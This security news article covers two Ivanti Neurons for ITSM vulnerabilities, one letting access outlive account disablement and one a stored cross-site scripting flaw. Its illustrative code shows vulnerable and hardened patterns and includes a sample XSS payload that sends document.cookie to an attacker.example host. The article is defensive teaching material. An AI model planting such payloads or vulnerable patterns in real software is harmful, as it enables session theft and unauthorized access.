Ivanti Neurons for ITSM Vulnerabilities Expose User Sessions to Remote Attackers
Ivanti has addressed two medium-severity vulnerabilities in its Neurons for IT Service Management (N-ITSM) platform. Both require an attacker who already holds an authenticated account, and both concern user sessions: one lets an account keep its access after an administrator has disabled it, the other lets an attacker plant script that runs in other users' sessions and exposes their session data. Ivanti states that, as of disclosure, it is not aware of either issue being exploited in the wild. Both were responsibly reported and are fixed in release 2025.4.
CVE-2026-4913: Improper Path Protection Flaw
The first vulnerability, identified as CVE-2026-4913, carries a CVSS score of 5.7 (medium). It is classed as improper protection of an alternate path: a control that is enforced on one route to a resource is not enforced on another route that reaches the same resource. In N-ITSM versions prior to 2025.4, a remote authenticated attacker can use this to retain access to the system after an administrator has disabled the account. That matters most where revocation is expected to take effect immediately: offboarding, or an active insider incident in which the first containment step is to disable the account. The vulnerability is network accessible, requires low privileges, and requires user interaction to be triggered, which is what holds the rating at medium.
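The following is an added example written for this article, not Ivanti's code, and it does not claim to reproduce the actual path involved in CVE-2026-4913. It shows the general shape of an access-retention flaw: account state is checked at login, but sessions issued before the account was disabled keep working because authorization never re-checks the principal. The hardened store revokes the account's sessions on disable and also re-checks account state on every request, so either control alone would fail closed. The last function is the check an administrator would want when reviewing an offboarding process: does an existing session survive disabling the account? All names, classes and sample accounts are constructed for the example.

```python
"""Access retention after account disablement: vulnerable pattern, fix, and check.
Illustrative code for this article; not Ivanti's implementation."""
import secrets
from dataclasses import dataclass


@dataclass
class Account:
    username: str
    disabled: bool = False


class VulnerableSessionStore:
    """Account state is checked once, at login. A session token is then
    accepted for as long as it exists, so disabling the account does nothing
    to sessions already issued. This is the access-retention pattern."""

    def __init__(self, accounts):
        self.accounts = accounts          # username -> Account
        self.sessions = {}                # token -> username

    def login(self, username):
        acct = self.accounts[username]
        if acct.disabled:
            raise PermissionError("account disabled")
        token = secrets.token_urlsafe(32)
        self.sessions[token] = username
        return token

    def disable(self, username):
        # The account flag flips, but every issued token stays valid.
        self.accounts[username].disabled = True

    def authorize(self, token):
        # Only asks "is this a token I issued?", never "is its owner still allowed?"
        return token in self.sessions


class HardenedSessionStore(VulnerableSessionStore):
    """Two independent controls so that revocation does not depend on a single path:
    (1) disabling an account revokes every session bound to it;
    (2) every request re-checks the account's current state, so a session that
        escaped (1) (a race, a token issued on another node) still fails closed."""

    def disable(self, username):
        self.accounts[username].disabled = True
        for token in [t for t, u in self.sessions.items() if u == username]:
            del self.sessions[token]       # (1) revoke

    def authorize(self, token):
        username = self.sessions.get(token)
        if username is None:
            return False
        acct = self.accounts.get(username)
        return acct is not None and not acct.disabled   # (2) re-check principal


def access_retained_after_disable(store_cls):
    """Offboarding check: log a user in, disable the account, and ask whether the
    pre-existing session still authorizes. True means deactivation is incomplete."""
    store = store_cls({"mallory": Account("mallory")})   # constructed test account
    token = store.login("mallory")
    if not store.authorize(token):
        raise AssertionError("fresh session should authorize before disable")
    store.disable("mallory")
    return store.authorize(token)


if __name__ == "__main__":
    print("vulnerable store keeps access after disable:",
          access_retained_after_disable(VulnerableSessionStore))
    print("hardened store keeps access after disable:  ",
          access_retained_after_disable(HardenedSessionStore))
```

The same check applies to a real deployment without any code: create a test account, sign in from a second browser, disable the account as an administrator, and confirm that the second browser's next request is rejected rather than served. Any token the account holds (browser session, API key, refresh token) should be tried the same way.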
CVE-2026-4914: Stored Cross-Site Scripting (XSS) Vulnerability
The second vulnerability, CVE-2026-4914, is a stored cross-site scripting (XSS) flaw with a CVSS score of 5.4, also medium. In N-ITSM versions prior to 2025.4, a remote authenticated attacker can store content that is later rendered unescaped, so the attacker's script executes in the browsers of other users who view it. Ivanti describes the impact as obtaining limited information from other users' sessions. In practice the reach of stored XSS is bounded by what the victim's browser exposes to script: a session cookie without the HttpOnly flag can be read directly, and even with the flag set the script can still act as the victim inside the application and read whatever ITSM data the victim is authorized to see. The attack requires user interaction: a victim has to open the page that renders the stored payload. The CVSS scope is recorded as changed because the vulnerable component (the ITSM server) differs from the component where the impact lands (the victim's browser), which is the standard scoring for XSS.
Affected Versions and Remediation
Both vulnerabilities affect Ivanti Neurons for ITSM version 2025.3 and all prior releases, across both on-premise and cloud deployments. To mitigate these risks, Ivanti has released version 2025.4, which addresses these security issues.
– On-Premise Customers: Manual upgrade to version 2025.4 is required. The update is available through the Ivanti License System (ILS).
– Cloud Customers: No action is necessary, as Ivanti applied the fix to all cloud environments on December 12, 2025.
Ivanti strongly urges all on-premise customers to apply the 2025.4 update immediately. No indicators of compromise have been published and no public exploitation has been observed, but organizations on older versions should still prioritize the upgrade. CVE-2026-4913 deserves particular attention wherever disabling an account is relied on as an immediate control, since the flaw means that step may not actually end the account's access.
Broader Context and Implications
These vulnerabilities illustrate two recurring weaknesses in enterprise IT service management platforms. The improper path protection flaw (CVE-2026-4913) is a reminder that disabling an account is only a revocation if it reaches everything the account holds: active browser sessions, API keys, refresh tokens and any cached authorization decisions. A check that runs only at login leaves every previously issued credential valid, which is exactly the window an offboarded employee or a contained insider would use.
The stored XSS vulnerability (CVE-2026-4914) is the classic web application failure: user-supplied content is persisted and later written into a page without encoding for the context it lands in. Because the script runs from the application's own origin, the browser grants it everything the victim's session is entitled to, so the attacker can read data, submit requests as the victim and, if the session cookie is not HttpOnly, take the cookie outright. The primary defence is output encoding matched to the output context (HTML text, attribute, JavaScript, URL); input validation and a Content Security Policy are worthwhile as defence in depth but do not substitute for it, and regular assessments should test every stored field that is later rendered.
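The block below is an added example for this article, not Ivanti's code, and it does not reproduce the real injection point of CVE-2026-4914. It illustrates the point made in the description of that flaw and in the paragraph above: a stored comment renderer that only strips script tags on input still ships a live payload, because the browser has many other ways to execute script, while encoding for the output context neutralizes the same stored content in both an HTML text sink and an attribute sink. The comments, author names and the attacker.example host are constructed for the example.

```python
"""Stored XSS in a ticket-comment renderer: input filtering alone versus output
encoding. Illustrative code for this article; not Ivanti's implementation."""
import html
import re

# Constructed sample: two comments persisted exactly as submitted, as a
# stored-XSS sink would do. The second carries an attribute break-out in the
# author field and an event-handler payload in the body; neither uses <script>.
STORED_COMMENTS = [
    {"author": "alice",
     "body": "Printer on floor 3 is jammed again"},
    {"author": 'mallory" onmouseover="alert(document.cookie)',
     "body": '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">'},
]

_SCRIPT_TAG = re.compile(r"<\s*/?\s*script[^>]*>", re.IGNORECASE)

TEMPLATE = '<div class="comment" data-author="%s">%s</div>'


def render_vulnerable(comment):
    """Input 'sanitizer' that removes <script> tags, then interpolates the result
    raw into HTML. Event handlers on other elements pass straight through, and
    the author field is never touched at all."""
    body = _SCRIPT_TAG.sub("", comment["body"])
    return TEMPLATE % (comment["author"], body)


def render_hardened(comment):
    """Output encoding chosen for the sink. html.escape(quote=True) encodes
    & < > " and ', which is correct for both HTML text content and a
    double-quoted attribute value, so both positions in TEMPLATE are covered."""
    author = html.escape(comment["author"], quote=True)
    body = html.escape(comment["body"], quote=True)
    return TEMPLATE % (author, body)


def leaks_markup(rendered):
    """Test oracle for this example: a raw <img tag, or a closing quote followed
    by a new attribute, means the stored payload is live in the victim's browser."""
    return "<img" in rendered or '" onmouseover="' in rendered


def render_page(renderer, comments=STORED_COMMENTS):
    """Render all stored comments with the given renderer, as a ticket view would."""
    return "\n".join(renderer(c) for c in comments)


if __name__ == "__main__":
    for name, renderer in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        page = render_page(renderer)
        print("%-10s leaks markup: %s" % (name, leaks_markup(page)))
        print(page)
        print()
```

Note what the hardened renderer does not fix: the payload is still stored, and any other consumer that renders the same field (an e-mail notification, an export, a mobile client) needs the same encoding at its own sink. That is why output encoding is applied where data leaves the system, not once at input. Setting HttpOnly on the session cookie would blunt the cookie-theft payload shown here, but script running in the victim's session could still read the page and issue requests as the victim.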
Recommendations for Organizations
To mitigate the risks associated with these vulnerabilities, organizations should consider the following actions:
1. Immediate Patch Application: Ensure that all instances of Ivanti Neurons for ITSM are updated to version 2025.4. This update addresses both CVE-2026-4913 and CVE-2026-4914, closing the identified security gaps.
2. Verify That Deactivation Actually Revokes Access: Do not assume that disabling an account ends its access. Test it with a throwaway account that has an active session and, where applicable, an API token: disable the account, then confirm that the existing session and token are rejected on their next request. Alert on activity attributed to an account after its recorded disable time.
3. Enhance Web Application Security: Include stored XSS in regular assessments by testing every field that is persisted and later rendered, not only the obvious ones. Treat output encoding for the rendering context as the primary control, with input validation and a Content Security Policy as defence in depth.
4. User Training and Awareness: Educate users about the risks of interacting with untrusted content and the importance of reporting suspicious activities. User awareness can be a critical line of defense against exploitation attempts.
5. Monitor for Indicators of Compromise: Ivanti has published no indicators for these issues, so monitoring has to target the behaviours they enable: activity by accounts after they were disabled, and stored ticket or comment fields containing HTML markup or event-handler attributes submitted before the upgrade. Review both even though no active exploitation has been reported.
By proactively addressing these vulnerabilities and implementing robust security measures, organizations can enhance their resilience against potential attacks targeting IT service management platforms.